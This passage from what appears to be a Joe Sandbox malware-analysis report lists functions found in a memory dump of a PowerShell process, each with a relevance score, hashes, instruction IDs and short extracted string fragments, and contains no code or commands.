                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d67e2963e055338504b4d3eb46d5fb2a7548141fcbdcf148a406e9bd78db6e91
                                                • Instruction ID: 939f8741e34077c4a0be2cd58f27878d8d0190a2515c45f7ee1b97b45985a3a6
                                                • Opcode Fuzzy Hash: d67e2963e055338504b4d3eb46d5fb2a7548141fcbdcf148a406e9bd78db6e91
                                                • Instruction Fuzzy Hash: 6C21ADF2B0434B7BFF284A7948017777E9A9F86710F14847A9949DB2C1DAB8DA80C365
                                                Function 07390C08 Relevance: .1, Instructions: 52COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6c45364ba21bee94e488c12e44dfc226879f8b0daf17cf3ac977bab458863178
                                                • Instruction ID: 9b9cac49c913195110b0807e344feafab2325c7305cd1b4942f69e5a4e00bde0
                                                • Opcode Fuzzy Hash: 6c45364ba21bee94e488c12e44dfc226879f8b0daf17cf3ac977bab458863178
                                                • Instruction Fuzzy Hash: 3C0124B631021B8BEF2859AA940017AB79ADBC1622F14843FD88DCA650DA32C845CB60
                                                Function 07391B9C Relevance: .0, Instructions: 27COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6d6413568a9627d1891ea77e6a3c86a47f03797450cfd93f9076e383170a685b
                                                • Instruction ID: c6f4bbdd42fe19070b062936d6fa313404a86d7458ebc20c7c6c9119cc9d6b40
                                                • Opcode Fuzzy Hash: 6d6413568a9627d1891ea77e6a3c86a47f03797450cfd93f9076e383170a685b
                                                • Instruction Fuzzy Hash: 84E0DF8160E7D01FCB1662202C209E96EA18B8316474501E7E646CF293C8141D48D3F3

                                                Non-executed Functions

                                                Function 07392AE0 Relevance: 12.9, Strings: 10, Instructions: 404COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ,S$l$,S$l$4'dq$4'dq$4'dq$4'dq$tPdq$tPdq$xS$l$$dq
                                                • API String ID: 0-3265367902
                                                • Opcode ID: b40e50b33ad3605af4ccb3a15c992e184d1d8e91e32fe47fe6ece4209cf93dc5
                                                • Instruction ID: 3c31e62259306b8a3200ebc3a07f1139826064b58482afff60c4597adbf4d46a
                                                • Opcode Fuzzy Hash: b40e50b33ad3605af4ccb3a15c992e184d1d8e91e32fe47fe6ece4209cf93dc5
                                                • Instruction Fuzzy Hash: C4D139F1B04706AFDF258B68881176BBBE2BF86311F14807AD94DCB651DB31C941C791
                                                Function 07395378 Relevance: 12.8, Strings: 10, Instructions: 305COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'dq$4'dq$4'dq$4'dq$$dq$$dq$$dq$$dq$$dq$$dq
                                                • API String ID: 0-4287419856
                                                • Opcode ID: 06ed2ffd49cbb1f30a89b12f6c1352abef27576f8ef97d6a0540f9a3dabefddb
                                                • Instruction ID: 2df682cca99248ac42f9aa78dafd0e3473f4e83486752d7db9c45c0350a01339
                                                • Opcode Fuzzy Hash: 06ed2ffd49cbb1f30a89b12f6c1352abef27576f8ef97d6a0540f9a3dabefddb
                                                • Instruction Fuzzy Hash: AAA12AF17052169FEF269A39D85076ABBE6AF85211F24807AD80DCB6C1DB31C8D1C7A1
                                                Function 0739C7F8 Relevance: 12.8, Strings: 10, Instructions: 304COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'dq$4'dq$4'dq$4'dq$$dq$$dq$$dq$$dq$$dq$$dq
                                                • API String ID: 0-4287419856
                                                • Opcode ID: 7c3f3ab2d99070ea2b6abb1ef8af8625edb5598a66eff4b5128a38a92dadb4b8
                                                • Instruction ID: d1a5465aa820d364f9abcd02b451f38d5c1c4112170419329ccaa2d3f35f0d1a
                                                • Opcode Fuzzy Hash: 7c3f3ab2d99070ea2b6abb1ef8af8625edb5598a66eff4b5128a38a92dadb4b8
                                                • Instruction Fuzzy Hash: 0DB1A2B1B1421ADFEF15CF78C4446AAB7A2BF85311F14E476D81D8B640DB31D981CBA1
                                                Function 0739DCC0 Relevance: 11.4, Strings: 9, Instructions: 196COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'dq$84"l$84"l$tPdq$tPdq$$dq$(jq$(jq$(jq
                                                • API String ID: 0-1663526480
                                                • Opcode ID: 24e321d98db11392c07e0cd108c76b646402aa6d295843512d5ad0fbfecfe87c
                                                • Instruction ID: 4c9c7d0221284cddb436542b78a9f2392ec5ff50ad7fa589509c9073eb43037a
                                                • Opcode Fuzzy Hash: 24e321d98db11392c07e0cd108c76b646402aa6d295843512d5ad0fbfecfe87c
                                                • Instruction Fuzzy Hash: DC61A1F1B21206DFEF24CE15C542B6AB7E6AF89711F198079E80A6B294D771DC40CB91
                                                Function 07393020 Relevance: 10.3, Strings: 8, Instructions: 326COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'dq$4'dq$tPdq$tPdq$$dq$$dq$$dq$$dq
                                                • API String ID: 0-4017470009
                                                • Opcode ID: f8514a1ae5f2501c408bd84c839a6ec683d50c394531e014ca1015d296cd99ed
                                                • Instruction ID: 6b743fbf9b89f1584385ecb7e232b3aab177bf586964caa1adb23355072a82b9
                                                • Opcode Fuzzy Hash: f8514a1ae5f2501c408bd84c839a6ec683d50c394531e014ca1015d296cd99ed
                                                • Instruction Fuzzy Hash: 61A127F17043159FEF249A69D8017A7BBE6AFC6311F14847AD84ACB391DA31C845C7A1
                                                Function 0739EF80 Relevance: 10.2, Strings: 8, Instructions: 191COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (f$l$(f$l$(f$l$(f$l$4'dq$4'dq$4!l$4!l
                                                • API String ID: 0-3778388573
                                                • Opcode ID: ce33e59cbf049eb4f7ead2cebf32a15e1ae1cccc40b0cebbd3cb7f7d4df1b7c8
                                                • Instruction ID: c397f901f8b65e6d4bc78e57a587cf911cf744a88cf018be38d1b40d01d81b44
                                                • Opcode Fuzzy Hash: ce33e59cbf049eb4f7ead2cebf32a15e1ae1cccc40b0cebbd3cb7f7d4df1b7c8
                                                • Instruction Fuzzy Hash: CA6183F0B00206DBDB18DB68C451A6ABBE7AF89715F14C479D809EB744DB32EC41CB92
                                                Function 0739D95C Relevance: 10.2, Strings: 8, Instructions: 163COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'dq$84"l$TQiq$TQiq$tPdq$$dq$$dq$$dq
                                                • API String ID: 0-1124355959
                                                • Opcode ID: a26f7fea2cc1782bf1e406433e7c4ec78e6571fbdf058053d90770c8bc42be7d
                                                • Instruction ID: a2839c5a3bf1e54c1df57bfe9215e9ea9fde8b9b2af3fd167bf048bc8d4f2b23
                                                • Opcode Fuzzy Hash: a26f7fea2cc1782bf1e406433e7c4ec78e6571fbdf058053d90770c8bc42be7d
                                                • Instruction Fuzzy Hash: C351F2F172420AEFEF24CE14C5467AAB7B6AF45311F1880BAE80D9B690C775DD90CB91
                                                Function 0739D970 Relevance: 10.2, Strings: 8, Instructions: 153COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'dq$84"l$TQiq$TQiq$tPdq$$dq$$dq$$dq
                                                • API String ID: 0-1124355959
                                                • Opcode ID: d8d76350150e1e40faed00c2054175d8cee3c0627d653883a4bbf6e0f793046e
                                                • Instruction ID: f98e5fb897c7e8656b1aa5eede63d942fb922c9006682d5a0dd2e80e1f1280e0
                                                • Opcode Fuzzy Hash: d8d76350150e1e40faed00c2054175d8cee3c0627d653883a4bbf6e0f793046e
                                                • Instruction Fuzzy Hash: A051DFF172420AEFFF24CE05C54676AB3A6AF45311F5880BAE80D9B690C775DD90CBA1
                                                Function 0739D3CC Relevance: 8.9, Strings: 7, Instructions: 177COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'dq$84"l$d%jq$d%jq$d%jq$tPdq$$dq
                                                • API String ID: 0-1700238634
                                                • Opcode ID: da249aff8efdf85d974ab0570e93a55ef95aae9292271375b1ec4fa8751ba939
                                                • Instruction ID: e1d61d6698706ff2ae20cc47dad9c3f96787af1811655a0828d06f9b1dc315cc
                                                • Opcode Fuzzy Hash: da249aff8efdf85d974ab0570e93a55ef95aae9292271375b1ec4fa8751ba939
                                                • Instruction Fuzzy Hash: 105104F0B24255DFEF248F14C44276ABBE2AF85254F5880BAE90D9F291DB31DC41CBA1
                                                Function 0739D428 Relevance: 8.9, Strings: 7, Instructions: 162COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'dq$84"l$d%jq$d%jq$d%jq$tPdq$$dq
                                                • API String ID: 0-1700238634
                                                • Opcode ID: b35151a6036964ace65e6e056c0ec50c44627363fe523011715fda2213d2ecd4
                                                • Instruction ID: 9e9a072bf54d84f2bb0c48b1aa431a4970ac47ba2f096372ba14b6eeb6ef2c74
                                                • Opcode Fuzzy Hash: b35151a6036964ace65e6e056c0ec50c44627363fe523011715fda2213d2ecd4
                                                • Instruction Fuzzy Hash: D85106F0B24215EFEF248F15C442B6AB7F6AF45250F5880B6D90DAB291DB31DC40CB91
                                                Function 07391350 Relevance: 8.0, Strings: 6, Instructions: 488COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'dq$4'dq$4'dq$4'dq$$dq$$dq
                                                • API String ID: 0-1592980071
                                                • Opcode ID: c354095f85989728d79ec2c51b44ec454beacef63f72e019cd45e8684575bd52
                                                • Instruction ID: a0659d5b92712b80b146f6179186cd5f7a9bd9eb45184705ed1d38aa3ef74f70
                                                • Opcode Fuzzy Hash: c354095f85989728d79ec2c51b44ec454beacef63f72e019cd45e8684575bd52
                                                • Instruction Fuzzy Hash: E81262B4B0120A9FDB14CB58C441BADFBF2BB89315F54C065E9096B795CB72EC42CB91
                                                Function 0739E364 Relevance: 7.7, Strings: 6, Instructions: 199COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'dq$84"l$tPdq$$dq$$dq$$dq
                                                • API String ID: 0-2972037801
                                                • Opcode ID: 18a7fea8546cc8f170f4ed5431a396eac530dbda012a536e4cf2d3d12bc09d67
                                                • Instruction ID: 668f72d2b98c74f54ea087f8d1c8f44130585606f66a417ec593771229658d72
                                                • Opcode Fuzzy Hash: 18a7fea8546cc8f170f4ed5431a396eac530dbda012a536e4cf2d3d12bc09d67
                                                • Instruction Fuzzy Hash: 2661DEF268021AEFFF24CE14C5407BA77A6AF45711F188076E8199B2D1DB71ED80CBA1
                                                Function 07391D08 Relevance: 7.7, Strings: 6, Instructions: 176COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'dq$4'dq$t~wq$$dq$$dq$$dq
                                                • API String ID: 0-1268362705
                                                • Opcode ID: 5ce22260b9a0fbf0552040d1f845ed43c504668b2c5502cbb486c74abb8fba10
                                                • Instruction ID: eee4b458cfcfad65239425f91bbce198660d08ee8109c3f1f84e5c39f1df1df3
                                                • Opcode Fuzzy Hash: 5ce22260b9a0fbf0552040d1f845ed43c504668b2c5502cbb486c74abb8fba10
                                                • Instruction Fuzzy Hash: BD5139F1B1424F9FEF155A68881027BBBA7AFC5311F24807AD849DF681DF318941C3A2
                                                Function 0739D56E Relevance: 7.6, Strings: 6, Instructions: 85COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'dq$84"l$d%jq$d%jq$d%jq$tPdq
                                                • API String ID: 0-3054513741
                                                • Opcode ID: 6ab5ba56f385d429354e35313f1cf9c70794df7fb6913b5cd2a8adbb65f41b9e
                                                • Instruction ID: 0004bee3d20b34503aeec861e78b0268b0bf0181a5564638b2f5c0c88199afa2
                                                • Opcode Fuzzy Hash: 6ab5ba56f385d429354e35313f1cf9c70794df7fb6913b5cd2a8adbb65f41b9e
                                                • Instruction Fuzzy Hash: 4231AFF1B10204AFDB14DF58C841A6ABBE6FB89710F65856AE91DAB344C731DC01CB90
                                                Function 0739E72C Relevance: 6.4, Strings: 5, Instructions: 124COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 84"l$XRiq$XRiq$tPdq$$dq
                                                • API String ID: 0-2653940123
                                                • Opcode ID: b05329e6f0496607757b471dd7ee5990c9e96d963413ef2156db03ce6457aaf6
                                                • Instruction ID: b77b41b184bc133195a0bfb0b16226aa7fc53fc6decde8e1cf1538c222b9099a
                                                • Opcode Fuzzy Hash: b05329e6f0496607757b471dd7ee5990c9e96d963413ef2156db03ce6457aaf6
                                                • Instruction Fuzzy Hash: 5741CFB2A44205DFEF24DF44C544AAAFBF2BF45B10F2980BAD8186B291C735DD40CB91
                                                Function 0739E740 Relevance: 6.4, Strings: 5, Instructions: 115COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 84"l$XRiq$XRiq$tPdq$$dq
                                                • API String ID: 0-2653940123
                                                • Opcode ID: 7bc0f84c1ecc0186544ba3b16bd0edb0e1f46369fa94455caf9c39de8916a5a3
                                                • Instruction ID: 5de97e6ce5fa83e9f75457d4d12d2508173b8b1cea79cacdbfa9fffcb9692ca4
                                                • Opcode Fuzzy Hash: 7bc0f84c1ecc0186544ba3b16bd0edb0e1f46369fa94455caf9c39de8916a5a3
                                                • Instruction Fuzzy Hash: 7F419FB2A44205DBEF24DF44C544AAAF7F6BF49B11F29C0BAE8186B291C735DD40CB91
                                                Function 0739CCC8 Relevance: 5.5, Strings: 4, Instructions: 494COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (odq$(odq$(odq$(odq
                                                • API String ID: 0-2844368422
                                                • Opcode ID: 1fb5a66f0d48a90e42be657e9f536f3c27df0afd0fe936cb41b1f543031885f1
                                                • Instruction ID: 56a3acfc16eade5e91dd5fce35fd6a06cb9f6cc1b87fcab60e12eb581207e83a
                                                • Opcode Fuzzy Hash: 1fb5a66f0d48a90e42be657e9f536f3c27df0afd0fe936cb41b1f543031885f1
                                                • Instruction Fuzzy Hash: 79F138B1714349DFEF158F38C8117AABBA2EF85311F14C47AE94A8B291DB31D841C7A1
                                                Function 07397838 Relevance: 5.3, Strings: 4, Instructions: 282COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 84"l$84"l$tPdq$tPdq
                                                • API String ID: 0-2458360423
                                                • Opcode ID: f985e57a9f5c773978e20ce5f04842131500a78446fc6f826471d1a7743827d9
                                                • Instruction ID: 1c0380da3a74793aff0fdbd92ef62c8a302cf7dc4419214ba1aafeadb9f7ca76
                                                • Opcode Fuzzy Hash: f985e57a9f5c773978e20ce5f04842131500a78446fc6f826471d1a7743827d9
                                                • Instruction Fuzzy Hash: 779133B17202169FEF149E69C851B7BBBE6AF85310F28C47AD8099B3C1DA31DD41C7A1
                                                Function 073900F0 Relevance: 5.2, Strings: 4, Instructions: 234COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'dq$4'dq$XY$l$XY$l
                                                • API String ID: 0-3438502865
                                                • Opcode ID: 93bf52a8f3816835bb0203fff1179bc587dc1bb93a4bc5b82d4a8a91d0b9c3be
                                                • Instruction ID: c5c03b309db11561fd7816f6814d99f4256324a7a416dd3ed23c0c928350a949
                                                • Opcode Fuzzy Hash: 93bf52a8f3816835bb0203fff1179bc587dc1bb93a4bc5b82d4a8a91d0b9c3be
                                                • Instruction Fuzzy Hash: 3D712BB570835BCFEF198B68D8516AABBA2AFC6311F14C07BD84DCB651DA31C841C7A1
                                                Function 0739C0B8 Relevance: 5.2, Strings: 4, Instructions: 212COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'dq$4'dq$4'dq$4'dq
                                                • API String ID: 0-2296240322
                                                • Opcode ID: 36355a6781f0c77c8d1605acbd5933562bf9f0a06a7d453d1f0d11e41182396b
                                                • Instruction ID: 2d7b127244961c6267a05bb4f2d0b3aebb484cb8b43339c42952c0f2552f04a5
                                                • Opcode Fuzzy Hash: 36355a6781f0c77c8d1605acbd5933562bf9f0a06a7d453d1f0d11e41182396b
                                                • Instruction Fuzzy Hash: 5861E7F1B0421ACFEF158A78C4112ABBBE6AFC6211F24947AC85DC7651DB31C981C7A1
                                                Function 07399780 Relevance: 5.2, Strings: 4, Instructions: 192COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (f$l$(f$l$(f$l$(f$l
                                                • API String ID: 0-1234685032
                                                • Opcode ID: 22da69ec4758c624d8f817f459b872f6489c5275a4fa309e79587e4803ab1f0e
                                                • Instruction ID: 8d46bc523475b54c260ab0d7c2e51b55aea2758a459a780187e7a7b84b32300d
                                                • Opcode Fuzzy Hash: 22da69ec4758c624d8f817f459b872f6489c5275a4fa309e79587e4803ab1f0e
                                                • Instruction Fuzzy Hash: 2F712BF0A102099BEB14CF58C491BAAFBE6ABC9315F14C06DD909AB755CB72E841CB91
                                                Function 0739EF62 Relevance: 5.2, Strings: 4, Instructions: 171COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (f$l$(f$l$4'dq$4!l
                                                • API String ID: 0-1961113602
                                                • Opcode ID: 247be75604448ecdf3bd83a5c93539535b403248653ce03aaaa3bd3d091b9f9e
                                                • Instruction ID: 89b94caed47124d8265be204378451bce37a16884233801af762884e895de17c
                                                • Opcode Fuzzy Hash: 247be75604448ecdf3bd83a5c93539535b403248653ce03aaaa3bd3d091b9f9e
                                                • Instruction Fuzzy Hash: D25180F4A00206DFEB14CB58C450AAABBF6AF89714F14C46AD449AB755C736EC41CB92
                                                Function 07391070 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $dq$$dq$$dq$$dq
                                                • API String ID: 0-185584874
                                                • Opcode ID: 9b898f4d5cd381d877ce15118138199dff973d1c614898528410de9d6087fca9
                                                • Instruction ID: 6fd56419112f5cdbc9121c1c3a7be937e6f9db7265c750dc533ab5966dadef3c
                                                • Opcode Fuzzy Hash: 9b898f4d5cd381d877ce15118138199dff973d1c614898528410de9d6087fca9
                                                • Instruction Fuzzy Hash: 622105B131025BABFF68996A8801777A7DA9BC4711F34843BA90DEB385DE76C8418361
                                                Function 0739B6D8 Relevance: 5.1, Strings: 4, Instructions: 67COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $dq$$dq$$dq$$dq
                                                • API String ID: 0-185584874
                                                • Opcode ID: 2bc331d0ee01fd18bb33001afaec93bbc53a9030db31dc361eb716c7c3a49190
                                                • Instruction ID: b67f405ba412e98df551532f7d8bb022b8244bd162780bf62622df27ed71a030
                                                • Opcode Fuzzy Hash: 2bc331d0ee01fd18bb33001afaec93bbc53a9030db31dc361eb716c7c3a49190
                                                • Instruction Fuzzy Hash: 7D119AF1A0520ADBFF209E99E940676F7A9FF85250F28827AC80C87641D732C544CBA1